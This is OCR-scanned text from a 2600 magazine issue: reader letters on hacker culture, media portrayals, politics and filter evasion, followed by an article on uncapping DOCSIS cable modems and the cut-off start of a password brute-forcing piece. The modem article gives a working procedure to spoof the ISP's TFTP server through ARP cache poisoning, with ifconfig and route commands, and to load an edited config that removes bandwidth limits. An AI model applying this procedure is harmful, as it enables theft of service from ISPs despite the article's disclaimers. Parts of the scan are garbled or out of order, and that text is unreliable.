in random pictures on 2600.com? Stegdetect reported
that a few jpgs from your site have information stored
with jphide. However I have been unable to crack
them to determine if this is true....

Ciiin 

Dear 2600:

At my law studies class this morning, we had a
guest speaker. He was a Secret Service agent. He
popped in a tape that explained to us what the Secret
Service was and why we wanted to be in it. In a couple
of scenes, they showed either your website or
magazine. I can't remember what the cover was though, so I
don't know how old it was. Anyway, the video was
talking about how the SS is very knowledgeable on
technological forms of theft, fraud, and hacking and
how their agents are highly trained in investigating
these things. It showed an agent pulling up your
website. Then later, when they were talking about credit
card fraud and other computer crimes, it showed a
desk with a computer and a 2600 sitting next to the






keyboard. Just thought you'd like to know. Don't they
have to ask permission for that or something?

Kaos lord 

Ft Lauderdale, FL 

We're not concerned about our covers being used
so much as we're concerned over the context. If
they're implying by their use that we're involved in
criminal activity then we have something to talk to
them about. We've been hearing about this video for
some time now - hopefully one day someone can get us
a copy of it.

Complaints 

Dear 2600:

The meetings for Orange County are a joke. It's
like a bunch of kids in a pissing contest. These people
are making 2600 look sorry.

john smith 

Let's be clear about our meetings and the
relationship between them and the magazine. Our affiliation is
a very loose one but we do consider the meetings to be
representative of what the magazine stands for. That's
why we have a set of guidelines (available in the
meetings section of our web pages or by e-mailing
meetings@2600.com) which spell out what's acceptable
and what isn't. For example, our meetings are open to
the world. That means inevitably people who don't
really believe in what we stand for will show up. We
cannot prevent this. Usually there are multiple sections at
any single meeting - their only common point being the
meeting guidelines. It's important to remember that no
one group of people runs any meeting. Therefore, to
define it as you have means that either you're paying
attention to the wrong people or the meeting has in
fact been subverted by idiots who don't respect our
guidelines. The latter has happened in the past and
probably will in the future. When we find out (and we
most always do), our name comes off it and it becomes
just an anonymous group of idiots in a mall on a
Friday night.

Dear 2600 : 

To the "hacker" who was on Cool FM 98.5 (in
Montreal) on 02/11/02: shut the fuck up! Thanks for
telling everyone that hackers are nothing but simple
thieves. I hope you die in horrible pain!

IHrl3z3 

There's nothing like an intelligent counterpoint to
prove a point.

Dear 2600: 

I am sick of it. I am sick of being labeled a
criminal. I am tired of being branded as a menace to society
and a threat to order. I was flipping through the TV
channels and I started watching some movie. It was
like Mas Something Super Spy, but anyways all it was
was some anti-hacker propaganda crap that
Hollywood churned out. I am so tired of it. We are
constantly being bashed because we are hackers. I hate the
common misconceptions of us. If you are a hacker that
means all you do is break into people's e-mail
accounts and write viruses. Even looking at the
dictionary is appalling. It says a hacker is "a talented
amateur user of computers, specifically one who
attempts to gain unauthorized access to files in various
systems." That is just not true. Hackers aren't evil, we
are really good people. But everyone hates us. Why?
Because we get the fallout from people who write
viruses and stuff like that, that's why. Because so and
so wrote a virus and the media said he was a hacker,
that means all of you hackers are evil. We get pinned
with the blame. It's getting so bad that if you say the
word hack people sorta cringe, like when you say
murder or something. But if you try and hide the fact that
you're a hacker you let them win. You let the media
make you ashamed of who you are. So be proud to be
a hacker, be proud of who and what you are.

Binary Burnout 

Worries 

Dear 2600:

Have you all had any concern of the U.S.
government freezing your assets due to "terrorist activity?"
(Not that hacking is a terroristic activity, but the U.S.
Patriot Act of 2001 says it is!)

Mr. Brown 

Our biggest comfort in that regard is that we don't
have a whole lot of assets in the first place. Actually,
that's probably not very comforting at all.

Dear 2600 : 

Here is something I thought everyone might find
interesting to think about. A few days ago I received a
code from a person asking me to crack it. A few days
later I did and sent him the decrypted message to prove
that I had done it. The reason he claimed for sending it
involved a huge "worldwide underground hacking
group." While he seemed to give the feeling that this
was something of a rather "elite" group, he mentioned
no specifics about it. After sending him the decrypted
code he proceeded to tell me that he worked for a
government agency in Australia called the ASIO
(Australian Security Intelligence Organization) and that
they were looking for people who could do things like
crack codes, hack, and so on. After hearing this I had
no desire to continue communication with this person
but here is the interesting part. The second step for
"joining" was to crack a harder code using a program.
Easy, right? Yes, but here is the catch. After doing so
they will hack the computer that you used to download
the program to look at your hard drive. So basically
they are looking for hackers and cyberterrorists but at
the same time are recruiting hackers. Anyway, once
they have hacked your computer (and this is
government!!!), they will use your computer as their personal
proxy. So if they are tracing a cyberterrorist and the
cyberterrorist is smart enough to figure out he is being
traced, he will send a trace back. At this point it would
lead to the ASIO's "proxy," in this case my computer.
So let's think about this. Now it looks like my
computer is tracing them and the cyberterrorists go after
this computer. Why would anyone in his or her right
mind let this happen? Hope this gives everyone
something to think about.

3-C oni 

Oh it does. Like perhaps you've confused your
computer with your TV set.




Dear 2600:

As if Carnivore wasn't bad enough, now we have
the government stealing our encryption keys to read
the encrypted files that we have every right to keep
private. This software known as "Magic Lantern"
apparently installs a key logger on a target computer to grab
the pass phrase used when pgp hinds. Our individual
rights are continually being violated by this "Cyber
Knight" project that encompasses Carnivore and
Magic Lantern. You gotta wonder what else they have
up their sleeve. I say we hold public protests. More
people need to be informed about this.

Silent 

In addition, when someone finally finds this thing
on their system, let us know so we can print an article
on how to detect it. In fact, we suspect there are people
actively trying to get it for just such a purpose.

Ideas 

Dear 2600:

I am working on a project right now you may find
of interest. I heard of a neat device called a Telezapper
which would not only automatically disconnect
telemarketers but because of the disconnection their
software removes you from their database. I looked into
the device and what it does is send out a tone
(disconnect pulse) to their switching equipment. Rather than
spend $40 to buy this device, I had the idea of using
my modem and sound card to generate the signal, so
all you need is a bit of software and cable. Once I get
this working and if no one has done this before, would
you be interested in an article?

Dr war 

We'd certainly like to know more. We know of no
such "disconnect pulse" that could be used to get rid of
anyone, let alone telemarketers. About the only thing
we can imagine is that this device plays the three tones
commonly heard before an intercept recording which
might make their auto-dialers assume it's not a valid
number. It's little more than wishful thinking that this
means your number would be purged from the database.
This could result in other calls being lost as well. But
most importantly, paying 50 bucks to have these tones
played would be a bit of a scam, to say the least. We
had (t better service (assuming you don't want to pick
up any calls that don't display caller ID) is offered by
many local phone companies at a fraction of the cost.

say their names. The called party's phone then rings
with that person's name and they can either accept the
call at that point or reject it (or completely ignore it).
Telemarketers who don't identify themselves never
even ring your phone.

More Politics 

Dear 2600:

I am a long time newsstand buyer of your magazine, which I've always found to be highly informative in its articles, while the letters of a political bent tend toward a naivete that strikingly contrasts the technical sophistication of contributors. Keep up the fight for the rights of individuals to use technology. Unfortunately, you seem to suffer from a similar naivete as your readers when it comes to other technologies, like guns.

Firearms are simply a technology, like any red box, laptop, modem, network card, Captain Crunch Ring, or computer programming language. They, like any technology, can be used to enhance or detract from individual liberty depending on the user, their intentions, and their actions. Thus, like any technology, firearms are morally neutral, inanimate objects. Just as a hacker could potentially ruin the life of any individual or group of individuals in the world via identity theft or other malicious abuses, any person possessing a firearm can similarly potentially ruin the lives of others. It is the actual actions of the individual wielding technology that determines actual results, as you have so rightly stated so many times in the past with regards to various computer technologies. You should be at least as consistent when it comes to other technologies, like guns, as well.

Mike 'retro man' Lorrey

We've always advocated the responsible use of any tool or technology and that it's the user of these who bears ultimate responsibility for their use/misuse. We believe tools and technology that directly foster communication, education, and the furtherance of free speech should be made as widely available as possible. This has always been our position. One simply cannot think of tools with obviously lethal functions in the same way, however. To do so is the height of irresponsibility.

Dear 2600: 

In 18:3, I was reading your response to a Canadian on page 31-32, and you guys mentioned something about the Canadian election system awarding the winner to the person who received the most votes. This is probably a good thing. However, the Electoral College in the U.S. does serve a purpose, and that is to make it harder for the states that are more populated to wield power over the states with lesser population, thus making it harder for a presidential candidate to win the office of President. Now, I do not think that Dubya should have won the presidency (I voted for Ralph Nader, and nearly persuaded my mother to do so on the way to the voting booth), but abolishing the Electoral College would give much more power to the East and West Coast (for better or worse), and make it that much easier for the majority to force their will on the minority. This is something the Framers made especially hard to do, and for a very good reason (i.e. slavery). I would like to know why you would have the Electoral College abolished.

Jon McLaughlin 

If imposing the will of the majority over the minority is such a threat, why don't we see systems like the Electoral College put into place for other elections and referendums? We're certain that we could find angry people in sparsely populated regions of every state who feel the people in the cities unduly influenced races for governor, senators, representatives, etc. Should we give these people more power because there are less of them? Is this not just another form of affirmative action which causes more harm than good? But the real proof that the Electoral College is a failed system (apart from all of the people in the rest of the world laughing and pointing) is in the official numbers for minority candidates. The person who you and many others wound up voting for got, according to the Electoral College, a total of zero votes. Does that seem even remotely close to fair?

Dear 2600:

I noticed in your response in 18:3 to the letter under the heading "Guns," you wrote "...oppression from the most powerful government in the history of mankind." I just wanted to correct you. The most powerful government in the history of mankind in terms of power was probably ancient Rome and, as far as size and possibly even power, the British Empire.

Joseph McLeod 

This will quickly devolve into semantics so let's define our terms. By "most powerful" we mean most capable of having a direct influence over all other parts of the world in a very decisive way, both militarily and legislatively. It's a frightening concept regardless of where you stand politically.

Dear 2600 : 

You do Mr. Conterio a grave injustice in your letters page (18:4). His arguments are the voice of reason - surely!

Look at it like this: there's only so much gun crime in the USA because the criminals can get guns easily. And as Mr. Conterio points out, you usually only have to show a gun to deter a crime. Naturally, it has to be a bigger gun than the criminal has.

So the solution is simple. Encourage everyone to get a bigger gun than the average criminal and carry it with them at all times. This does leave the poorer sections of society more vulnerable (being unable to buy a big gun), but this is all to the good as it means the criminals will target them, instead of respectable, law-abiding citizens (with money).

But I wouldn't stop there! Who is to say that adults have more of a right to life than children? And having seen the reports on atrocities in high schools over recent years, is it not reasonable to campaign for children to be able to defend themselves? Of course they should! "Guns In Schools" can be the campaign slogan. With proper training (it should be a required subject), most children are every bit as capable and responsible as an average adult to own and use a gun (well, an average adult after a beer or two, anyway).

I mean, if somebody went into a school with a machine that could launch baseball bats faster than the speed of sound at the rate of one hundred per minute, would you ban baseball bats?

I think my point is abundantly clear, and I trust I have your full support in this matter.

m skz 

We noticed you shied away from the infants' right to carry issue. Coward.

Observations 

Dear 2600 : 

I borrowed my friend's copy of Grand Theft Auto 3 for Playstation 2 and he informed me that a guy on one of the radio stations proclaimed "Free Kevin!" So for the next few days when I played I would set the radio station to "Chatterbox" and after a while I finally heard it. It was kind of pleasing to hear the message on such a popular video game. Then when I was looking through the booklet for the game, I noticed they listed guests for "Chatterbox" in the back. So I read through and noticed the name "Bernie S." Very nice.

noire 

Dear 2600:

Hey guys, great issue. I was walking out of Barnes and Noble at dusk with the magazine (18:3) in my hand looking at the cover. As I crossed under a light the glare revealed the secret item! The peace sign. I love it. Always keeping us on our toes. Thanks guys.

Gustaf 

Dear 2600: 

I was signed into MSN Messenger on January 10th at M;]() Eastern Time, and I got a "Maintenance Alert" dialog box telling me that MSN will go down in five minutes for maintenance. If this happened to everyone, then there is obviously some way that you can call a dialog box on the machine of everyone who is signed into MSN at the moment. It kind of makes you wonder what kind of other events they might be able to initiate. If anyone had a packet sniffer running and caught this, or if you have more information on how this may work, please let us know.

p&ykOmantis 

Dear 2600: 

I recently moved into a cheap three-story apartment building. One day I got curious and started to take the faceplates off the wall. Behind where my phone line came in I discovered not just one wire, but three! Upon further investigation I found that one was for my apartment, with the two others providing dial tone to the floor below me and the floor below them! Think about how easy it would be to tap into the line. I found a similar configuration for the cable television lines. Do you have a phreak for your upstairs neighbor? Are you sure?

bluuess 

More proof of how insecure phone lines really are. This is very unlikely to ever change.


Dear 2600: 

I was watching the other day (again) the movie Hackers and something caught my eye on the desk where Kate "Acid Burn" Libby is preparing for her "battle" with fellow hacker Dade "Zero Cool/Crash Override" Murphy. That is a copy of the magazine 2600. I wonder how many others caught this.

Hernia ei 

Another appearance occurs when the federal agent is reading "The Hacker Manifesto" in the car. He's holding a copy of our magazine. That piece, however, appeared in "Phrack," not here. They couldn't figure out how to hold up a copy of an electronic newsletter so they just revised history a bit. Also, check out the subway car scene as well as the wall in Phantom Phreak's room. Those are original yellow HOPE bumper stickers from 1994, now worth many thousands on E-bay.


Dear 2600: 

I have read before how someone used "safe web" to get around school or public firewalls but the problem is sites like those are always blocked. But the one thing they can never block are translator web sites, like Alta Vista. All you have to do is enter the URL and change the language from "whatever" to English. Let's say you select German to English. It will go through, change all the German words to English, leave all the English words, and bam! You are at 2600.com.

Cody Beeson

We suggest using Chinese to English since there are enough German words with the same spelling as English ones to make our web site rather weird to read if you try to "translate" from German.

Dear 2600:

Just wanted to let you guys know you're getting some free advertising. I was reading this humorous Final Fantasy parody when I came across this page showing a character reading 2600 at http://www.nuklearpower.com/comic/058.htm. I hope I'm not getting the author of the comic in any trouble. (No, I'm not him.)

DephKonl 

Dear 2600: 

I wish this letter had more point to it, but it really doesn't. In the sentence in your Marketplace section of 18:3 and 18:4 (I'd presume more of them) under the heading "Only subscribers can advertise in 2600!" you will notice near the end of the paragraph it says, "Include your address label or a photocopy so we know you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953. Include your address label or photocopy."

Otherwise, I love the publication. Keep up the good work. The hidden "peace" symbol in 18:3 was really neat and I never noticed it until others pointed it out later.

4wifitc^07 

Well, we never noticed this repeating phrase until you pointed it out so thanks. It's the end of an oversight that's been occurring since Spring 1998.

Dear 2600: 

In addition to the article I wrote on Black Ice for the 18:4 issue of 2600, I would like to mention that ISS has released a patch for users with Windows XP and 2K. There is a hole that will allow "hackers" to execute computer jacking and crashing. Normal stuff. Just thought I should put that out there since it was not in the original write up.

Suicidal 

Dear 2600: 

On the Rat Race DVD, as an extra, the producer and director do candid calls to the actors in the film. They apparently didn't know that the touch tones recorded in the conversations can be used to call the actors!

As a friend of mine put it, "Hey, I got your phone number off of the DVD... you should have bought a squirrel!"

Phonkud utic 

A reference lost on anyone who hasn't seen the film. We imagine some actors wound up having to change their numbers after this rather stupid over


Dear 2600: 

We enjoy wearing brown pants and sniffing your
magazine on Wednesday evenings while composing 
music with our Tandy are wearing 

brown pants' 

1W Avocados 

And this is as strangely haunting as a David Lynch film.


The World of Retail 


Dear 2600:

I was in a local bookstore in Sacramento, California that I know carries your periodical and I decided to check to see if I had your current issue. I was surprised to see a fairly large stack of your magazine hiding behind an issue of something or other. Needless to say, I already had that issue so I moved the magazine to uncover it for other customers. I came to the conclusion that it was intentionally covered when I returned a week or so later to discover the same situation. I don't know if an employee was doing this or someone else with a strange hobby, but either way I think it's a terrible way to sell magazines. Perhaps you at 2600 should start printing on excessively large paper to increase visibility. I plan to make it a routine to stop at that bookstore to make sure you are kept visible to shoppers. You're probably thinking why don't I tell the shopkeepers? Well, it just ain't my style.

The Dude 

We appreciate all of our readers who look out for this sort of thing. Most of the time the people who hide our magazines aren't affiliated with the stores. We simply have a lot of enemies who don't want our views to be heard. Consider it an attack on all of us.


Injustice 


Dear 2600: 

In response to "Consequences" published in 18:3, I am not sure that everyone is aware of how bad things have gotten. I think it is horrible that Sklyarov was arrested for violating the DMCA when what was being done promoted the sale of more eBooks. There are many injustices that have been done to many good people. As far as I know, I am the first person to be arrested for performing a port scan in the process of protecting a 911 system I was put in charge of. A simple port scan now seems to be an offense that one can be arrested for. While I have been successful at defending myself so far, it is still something that most computer people don't realize the rest of the world doesn't understand and which therefore must be illegal. Several articles have been written on my case, one by Bill Reilly, who is working on the Elcomsoft (Dmitry Sklyarov's employer) case. It can be seen at:
http: // w w warn I i n esecuri ty.eom/Commumty_Forum„_d etai 1 .ph p?artic le_id -23
Being the first to have to defend a case of this type I can tell you it is a very difficult task to undertake and I don't wish it on anyone. The devastation to business and family as well as bank account is tremendous and I am not sure that many people understand what is involved. I thank your magazine for doing a great job on promoting rights and telling some of these stories so that the people know what is going on.

Scott Moulton 
System Specialist and Software Engineer 

Dear 2600: 

I was working at Bridgestone Firestone Information Services during the recall, so I was already bitter. The lawsuit against 2600 is too much... doubt I'll ever drive a Ford again.

Found On Road Dead, cute huh? 

bt 

Dear 2600:

So I am in Omaha visiting my girlfriend over the Christmas break. Just before I left I grabbed a 2600 at B&N to read on the flight home. I flew into Chicago and had to switch planes.

Whenever I fly I ask to sit in emergency exit rows in order to get more leg room. Before takeoff, the flight attendant stopped by to make sure that I would agree to perform emergency tasks if needed. I told her it was no problem and continued reading my magazine.

I was into reading an article when I finally realized that we hadn't left the terminal yet. I looked up and a man had come onto the plane from the terminal. I watched him as he came up to me and said, "Sir, I need you to step off the plane, please bring your things."

Confused, I stood up and walked off the plane. Once on the sky-bridge, they informed me that I was going to be "screened" again. Before they started I asked why, and they replied, "the flight attendant said you were reading a terrorist pamphlet." I was confused at best and then explained to them that it was a magazine about "computers and electronics." They then asked if they could look at it and had to OK it with the pilots before I was allowed back on the plane. Oh yeah, I had to be "screened" again as well.

My guess is that she saw the article about "vulnerabilities" in "Passport" (regarding the article on Microsoft's new .Net Passport stuff).

I understand that with all of the recent events that people are more concerned about security, but I think there is a place where we need to draw the line. Causing a flight to be delayed for more than an hour over my reading a magazine is not acceptable.

Anthony \h Bower 

Please write back to us (paper mail will get a human's attention a lot faster) with as much specific information on this as possible. When such events occur we need to know exactly who is responsible so they can be dealt with as severely as possible. The idea that you can be taken off a plane because some dimwit doesn't understand your reading material should be considered an affront to every freethinking person alive.

Dear 2600:

I can't believe it! Absolutely outrageous! Rogers has really pissed me off this time! I called Rogers' tech support for their cable Internet and I found out that you aren't allowed to run web servers while you are connected via Rogers Cable. If you do, then apparently you will be found out and they will come and take your cable modem away. Geez, all I wanted to do was run a puny little game server for Unreal Tournament. The tech support guy told me that they scan all of their Rogers Cable customers for web servers. I think that this is stupid. Why would Rogers do that? Is there any way to circumvent the scans, so that my Unreal Tournament server dream can become a reality?

Johnny Slash 

Internet access via a cable modem is not true Internet access. It's primarily meant for outgoing traffic, not incoming, such as you would be getting on a web server. This is yet another reason to support your local Internet Service Provider who will generally not get in your way as to how you choose to use the net.

Dear 2600: 

Recently I received a chain letter in my inbox. The chain letter had a boring poem about two friends who are too busy in life to speak to each other. When one finally decides to visit the other, he turned out to be dead from old age. What this has to do with a chain letter aside from conveying a moral of no use, I can't determine. The letter had a standard set of instructions. Send this letter to a dozen or so people within three hours of reading or suffer incredible bad luck.

I dug up all the e-mail addresses listed in the e-mail and replied back to them. I quoted Robert Frost, "The Road Less Traveled," and told them all to take the road less traveled and not forward the chain letter on to a dozen other people to venture on into an endless tree of useless e-mail.

To my surprise, I received several replies from people who could not determine how I knew their e-mail addresses, even though the e-mail I sent to them had the original chain letter within the body. Apparently, I pissed off a bunch of people making them feel foolish for sending the message to their friends. If you consider it, it's thinking only about yourself that drives you to ship off an e-mail to all your friends so they can take on the burden of bad luck if they don't spam others within three hours of reading.

To make a long story short, I was supposedly reported to some Internet security agencies and told I wasn't aware of the repercussions of my actions.

Tell me I don't have the right to free speech. "Nicolai... you don't have the right to free speech." There we have it.

Nicolai 

Dear 2600: 

I just wanted to write a quick letter to you guys telling you that I e-mailed Ford informing them that I was boycotting (and encouraging everyone I knew to boycott) them due to the legal actions they were taking against 2600. I told them that freedom of speech is probably the most important freedom we have as Americans and that I could not accept them taking legal actions to prevent said freedom. Thanks for the great magazine and website, guys. If you keep writing, I'll keep reading.

S unlist 

Dear 2600: 

Why is it that those in power are so afraid of people who they see as a threat to that power? I'm enrolled in a Business Technology course at my high school. It's sold as some super advanced course, but I personally find it to be a little below my level, so I find myself spending most of my time helping the instructor with little projects on the side. A few weeks ago we replaced his school-owned piece of shit computer with a rather nice Pentium III machine we built ourselves. In order to connect to the school network however, we required a couple of programs which the system admins refuse to give out. Namely Novell Client software and some program the teachers use to do attendance and gradebooks called STL. After several work orders were filed in an attempt to get someone from the tech department to come and take care of this issue for us - each of which was simply ignored - we decided to take matters into our own hands. After a couple of hours spent scrolling through every directory on every network drive on the school server (access to which his "teacher access" provided - no hacking was required), I managed to find copies of both programs needed. We downloaded the software and got our system up and running. Yesterday he was called into a meeting with the Superintendent of Schools and accused of using his class to train hackers. He is now teaching a restricted curriculum. They tell him quite specifically what he can and can't teach. Myself and a few other students who had absolutely nothing to do with the alleged attacks now have our computer privileges closely scrutinized. We also have reason to believe that certain individuals in the upper levels of the admin hierarchy have been sabotaging our equipment. Ultimately what it comes down to is this: the school tech department sees myself and a few other students as a free source of labor which the school board can tap to do their jobs. This threatens their paycheck, so we're on the shit list. I have three months to go until I graduate high school and get rid of all this bullshit once and for all. I'm biting my tongue and resisting the urge to do some real damage. Why is it that people in power seem to go out of their way to threaten, anger, and ultimately push perfectly legitimate hackers to do the kind of things that give us a bad rep? I'd have to say that not wanting to restrict future generations even further is the only reason I haven't done such things yet. Just three more months.

Ghent 

Even if you were the foM t Jto.i of .sem^rs in your high school, destruction wouldn't be the answer. Nothing would make the morons who antagonize you happier. What's important is for you to reveal their stupidity in ways that non-technical people can understand. You've indicated that there is a paper trail which would prove that you attempted to get help from the tech department and that they ignored you. Assuming you didn't violate any software licenses in doing what you did, it should be a snap to prove that you did nothing wrong. There's no reason why you can't (or shouldn't) continue to help with this after you're gone.

Dear 2600:

I was pretty disgusted when a friend of mine told me about a new kids' show that his kids were watching. It's called Cyberchase and the URL is at: http://pbskids.org/cyberchase/meet_hacker.html.

He said, "I haven't seen more than two minutes of it, but the gist of the show is that hackers are bad. In fact, my kids now call each other 'hacker' as a put-down."

They are planting seeds I tell ya. I like PBS but after seeing this, I'm going to write a short note to the pbskids.org site (unless you have a better contact), just to let them know how I feel about this "toon."

Just thought I'd pass along this info. Maybe others might want to rethink donations or write a (nice) short note.

johnny fulcrum 

It's essential that people express their feelings about this since it's a really unfair characterization. Contact your local PBS station as well as PBS, the Corporation for Public Broadcasting, and the National Science Foundation, all of whom provide funding. It's bad enough to have the evil character be a hacker but for his actual name to be Hacker is a bit much.

Dear 2600: 

I had nothing to do last Monday so I went to a lecture given by Janet Reno at my college. I was bored, and I thought that she might have something intelligent to say. After announcing that she was running for governor in Florida and an unconvincing tirade about how we need to "shake up the government system," Reno stated that "we need to protect our young children from the hackers that try to seduce them in chat rooms and prevent hackers living in other countries from stealing funds from America's banking institutions." After this broad generalization, I was pissed and wrote a question on the paper provided by the proctor at the assembly. After a slew of questions about health care, the legal system, and even a question about whether Jeb Bush was more intelligent than George W. Bush, she neglected to answer "Why are hackers still being criminally prosecuted for pointing out blatant and potentially dangerous security holes in government and business computer networks?" I guess our nation's politicians are still unable or unwilling to tackle the injustice in our society.

Polar Mike 

She probably watched an episode of "Cyberchase" right before giving that speech. Children's cartoons are popular with politicians and it explains the level of their intellect. It would be a good idea to keep track of all the stupid things they say about hackers.


Dear 2600 : 

As I am sure you know, the goddamned SSSCA is still being bandied about. This is basically the complete bending over of customers by the RIAA, MPAA, and other lobbying groups. Because Congress is here to represent business, right? This country was started on the premise "We hold these truths to be self evident: every corporation has the right to as much profit as possible, regardless of the rights, health, or well being of the citizens of these United States," right?

Here is a great website that is trying to fight by sending faxes to congresspeople: http://www.digitalconsumer.org/fax.html. You can use their letter, modify it, or write your own. Please take a moment to do this. Maybe we can get some of our rights back for a change.

(Continued on page 48)





by Paiikaj A rota mi 

pankh pirorn pa wa re.efifii 

An interesting aspect of cable modem tech- 
nology is the evolution and standardization of the 
Dam Over Cabt^ervire Interface Specification 
( DOC' S f S ) , de ve lof ied by C af S c Tc I ev isi on Labo - 
ratones, Inc. and approved by the b)icruauon,al 
Telecommunication Union (ITUJ. 

The locus of this piece deals with the way 
ISPs configure DOCS IS -compliant cable 
modems and is constructed in a fashion that edu- 
cates the reader on how a cable modem user 
could potential I v configure their own device. 
Take very important note* reconfiguring and/or 
tampering wit It your cable modem not only most 
likely breaks your terms of service agreement but 
could potential !y be found illegal in most juris- 
dictions and would then be punishable by law. If 
you wish to experiment, prior permission from 
your cable modem service provider would most 
certainly be necessary. 1 urge you Lo educate 
yourself through this writing but not to break the 
rules, and I urge cable modem service providers 
to use the information contained in this article to 


"spoofablc ’ 1 ) MAC address which will be accom- 
panied by an IP address which is either static or 
dynamically assigned by the ISP and of course 
handled in software. 

However, a feyrffhings most people may not 
know are: 1 ) Thefcabie modem itself has a hard- 
ware address arid in IP address on the HFC inter- 
face and 2} The cable modem itself has another IP 
address on the CPE interlace. Generally this IP 
address is 1 92, 1 68. 100. 1 , 

When you turn your cable modem on. ii uses a 
primitive TCP/IP stack and DHCP client to re- 
quest an IP address for the HFC interface. With 
some ISPs the IP address it will receive will be a 
Hkx.x.x add re s s . Addi t i onal 1 y , upo n rece i v i n g t he 
IP address for the HFC interface, it may also re 
eeive the IP address for the ISP's Trivial File 
Transfer Protocol (TFTP) server. Upon the mo- 
dem obtaining the IP address for the TFTP server 
it will connect to the server, download a configu- 
ration file. and use that to setup such thing* as 
downstream and upstream bandwidth caps. Its a 
rather simple process that usually doesn’t take 
more than a minute. 


help better protect their service, 1 have a cable 
modem myself and I respect my cable company 
and the law - but 1 also highly value free speech 
and learning. 

This article makes the assumption that the 
read e r h a s prior 1C P/1 P, networking, a nd Li n u x 
knowledge (although this can theoretically be 
done on plenty of other OSes). There are certain 
exceptions to the content of this article and claims 
are based on a generalization of the DOCS IS - 
compliant cable modems that exist on the marker 
today as well as my own testing - and the work of 
others. 

How does an ISP configure DOCSIS-compliant
cable modems? To answer that, one should
first take notice of the interfaces on a cable modem.
One interface connects to the coaxial cable
itself. This is the HFC interface. Another is
traditionally either Ethernet or USB (or both in some
models) which is used to connect the cable modem
to the customer's computer (or other network
device). This is the CPE interface. As you may
already know, the device we connect the cable modem
to will have a hard-coded (but still

How would one hypothetically configure a cable
modem? To configure a cable modem, the first
thing one would have to do is obtain the IP address
of the ISP's TFTP server. For some it may
actually be the same as the ISP's DHCP server. To
find the address one could look at the information
provided by the cable modem's mini web server
(which exists on some modems such as certain
Motorola SurfBoard models and can be accessed
via the Ethernet/USB interface IP address, e.g.
192.168.100.1, using a standard web browser).
Conversely, if that option isn't available or if the
TFTP server information isn't given via the web
server, then one could possibly use an SNMP
client to scan the modem for that same information.


Using this same process, one would also
need to obtain the name of the DOCSIS
configuration file the modem downloads since TFTP
doesn't allow you to list directories and thus a
specific filename must be known to be able to
download the configuration file. Once you find
that out, the next steps are to use a TFTP client to
download the configuration file off the ISP's




TFTP server and to use a DOCSIS utility to
decode the file into a readable text format. Once you
decode the configuration file, it will look
something like this:

Main {
    NetworkAccess 1;
    ClassOfService {
        ClassID 1;
        MaxRateDown 1544000;
        MaxRateUp 128000;
        PriorityUp 0;
        GuaranteedUp 0;
        MaxBurstUp 0;
        PrivacyEnable 0;
    }
    MaxCPE 3;
    /* EndOfDataMarker */
}

One could theoretically adjust the settings to
his or her own preference. For example, setting
MaxRateUp to 0 would remove any upstream cap
that may exist on the cable modem's end and
setting MaxRateDown to 0 would do the same for
downstream. After any changes are made, the file
can be re-encoded using a DOCSIS utility. Again,
let me stress to you, know the rules and follow
them. This information is provided for
understanding and was not produced with the intent of
fostering and/or promoting illegal activities. Be
smart and keep it legal, but at the same time don't
be afraid to learn about this technology.

How would one apply the configuration themselves?
The next steps involve running both a
TFTP server and a time server (since many cable
modems time-stamp log entries those modems
make) on the computer/device that is connected
to the cable modem (CPE interface). The process
is rather straightforward:

1) Place the configuration file in the root
directory of the TFTP server making sure you use
the exact same file name your ISP uses.

2) Depending on what OS you use you may
want to create an entry in your HOSTS file for the
modem's CPE IP address (since DNS will not be
available when the cable modem is connecting to
the TFTP server and things such as the standard
Linux inetd service does not like the lack of DNS
availability when resolving hostnames - most
Linux distributions have the HOSTS file at:
/etc/hosts).

3) Create an alias IP address on the interface
the cable modem is connected to. As you may
have guessed, the alias IP address needs to be the
IP address of the TFTP server as you are going to
be doing a little spoofing. Depending on your OS,
this can be done in a variety of ways. Under
Linux, with IP Aliasing installed in the kernel,
one could simply issue the following command:
ifconfig eth0:1 <tftp server> netmask
255.255.255.255. Replace <tftp server> with the
IP address of your ISP's TFTP server of course. If
you don't have IP Aliasing built into the kernel or
otherwise generally available you could just
theoretically change your IP address to that of the
TFTP server for the time being. You will want to
ensure you set the netmask to 255.255.255.255 to
avoid unwanted network routes which could
cause problems.

4) The next step is to create a static route to
your cable modem to ensure you are coming from
the spoofed address. Under Linux one could issue
the command: route add -host <cpe interface ip
address> gw <tftp server> again replacing that
which is in brackets with the proper values.

5) Once all the preceding setup is complete,
one would start their TFTP and time server with
everything in place and start pinging the cable
modem's CPE IP address and then, while that is
occurring, reset the cable modem (or unplug it for
a few moments and plug it back in).

If you were able to get this far and you set
everything up right, chances are the cable modem
will download the configuration file from you.
Once this is complete the aliased address can be
deleted or the IP address can be set back to DHCP
or the static address given by your ISP.
Additionally, you can stop pinging. You can verify this
works via an SNMP query on the CPE interface
or by just testing the results of any changes made.

Back up! How does this all make sense? The
setup is similar to that of how it is set up on an
ISP's end, for the most part. The pinging of the
cable modem's CPE interface "poisons" the ARP
cache of the cable modem and the resetting of the
modem flushes the cache so the ISP's TFTP
server MAC address (the real one) is flushed out.
This process essentially makes the cable modem
believe the MAC address of the TFTP server is
yours instead of that which belongs to the ISP's
TFTP server which - as far as the cable modem is
concerned - makes you the TFTP server it wants.
So when it's ready, it will connect to your box and
get your configuration file. If you have a detailed
enough understanding of TCP/IP this should
make sense. If not it's okay, there are plenty of
resources available to learn more of the
fundamentals. There are many potential barriers an ISP may
and should put in place to prevent this procedure
from working. Additionally, some cable modems
don't allow you to ping the CPE interface until it
obtains the TFTP configuration file, which would
essentially prevent the spoofing from working as
it will cache the correct MAC address before you
can deliver it the wrong one by pinging it.
However, for the most part this process tends to work -
at least for now.

I hope this article extended your understanding
of how cable modems work and are configured -
the utilities, servers, and services
mentioned in this article are readily available on
the web for numerous platforms.





by hairball

hairball@illgotten.net

In the course of a computer security professional's everyday web surfing, we can't help but come
across several programs that can do "interesting" things with passwords. From the everyday Unix/Linux
password cracker to the Windows brute forcing programs strewn all over the Internet, I see the same
single problem that seems to envelop most of them. Many read from a password list instead of generating
the passwords as they go. While this makes perfect sense when used with "most common passwords"
lists and all, when it comes to brute force this is very impractical due to the large number of possible
password combinations. Let's do a little investigation.

As many of you probably already know, the ASCII character set contains a total of 256 unique
characters. Remember that a byte is eight bits, and that a bit is a one or a zero. Therefore, in the range
00000000-11111111, only 256 possibilities exist. So every file in existence can only contain
combinations of these 256 characters and nothing more. Numbered 0-255, each character possible has its own
